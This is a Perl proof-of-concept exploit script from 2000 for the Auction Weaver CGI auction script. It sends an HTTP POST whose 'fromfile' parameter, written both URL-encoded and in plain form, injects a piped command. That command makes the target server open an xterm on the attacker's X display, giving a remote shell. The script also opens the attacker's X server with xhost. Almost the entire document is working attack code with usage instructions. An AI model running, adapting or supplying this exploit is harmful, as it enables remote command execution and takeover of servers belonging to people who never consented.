#!/usr/bin/perl -w

## Auction Weaver 1.02 / Only confirmed with LITE
##        -  Proof of Concept exploit -
##
## CGI Script Center have just released an update
## of Auction Weaver due to security reasons - I
## suggest that you spend some more time securing
## it, and the other scripts - It is really needed.
##
## This exploit will spawn a xterm from $target
## to $attacker. All versions of  Auction Weaver
## below 1.02 is exploitable.
##
## This exploit will not work on hosts running
## Auction Weaver on NT, due to the xterm call.
##
## CGI Script Center, please contact me if you need
## help with securing your scripts...
##
## teleh0r@doglover.com / anno 2000
## http://teleh0r.cjb.net

use strict; use Socket;

if (@ARGV < 3) {
  print("Usage: $0 <target> <attacker> <dpy>\n");
  exit(1);
}

my($target,$attacker,$dpy,$length,$cgicode,
$agent,$sploit,$iaddr,$paddr,$proto);

($target,$attacker,$dpy) = @ARGV;

if ($dpy !~ /\d/) {
  print("dpy must be a number, probably 0\n");
  exit(1);
}
print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

system("xhost + $target");

$length = 362 + length($attacker.$dpy);

# elite & stealty cgicode...heh!
$cgicode =
  "\%66\%6c\%61\%67\%31=\%31&\%66\%72\%6f\%6d\%66".
  "\%69\%6c\%65=\%7C\%78\%74\%65\%72\%6d+\%2d\%75".
  "\%74+\%2d\%64\%69\%73\%70\%6c\%61\%79+$attacker".
  ":$dpy\%7C&\%70\%6c\%61\%63\%65\%62\%69\%64=\%31".
  "&\%63\%61\%74\%64\%69\%72=\%63\%61\%74\%31&\%75".
  "\%73\%65\%72\%6e\%61\%6d\%65=\%74\%65\%6c\%65\%".
  "68\%30\%72&\%70\%61\%73\%73\%77\%6f\%72\%64=\%6".
  "f\%68\%62\%61\%62\%79&\%62\%69\%64=\%49\%68\%61".
  "\%76\%65\%6e\%6f\%6d\%6f\%6e\%65\%79&\%6e\%6f\%".
  "62\%69\%64\%69\%74\%65\%6d=\%31&\%73\%62\%75\%7".
  "4\%74\%6f\%6e=\%42\%49\%44";

# old & boring code
#"flag1=1&fromfile=%7Cxterm+-ut+-display+$attacker%3A".
#"$dpy%7C&placebid=1&catdir=cat1&username=teleh0r&pas".
#"sword=ohbaby&bid=Ihavenomoney&nobidite=1&sbutton=BID";

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to auctionweaver.pl may of course need to be changed.

$sploit=
"POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

sleep(3);
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0)
#                   www.hack.co.za   [7 September 2000]#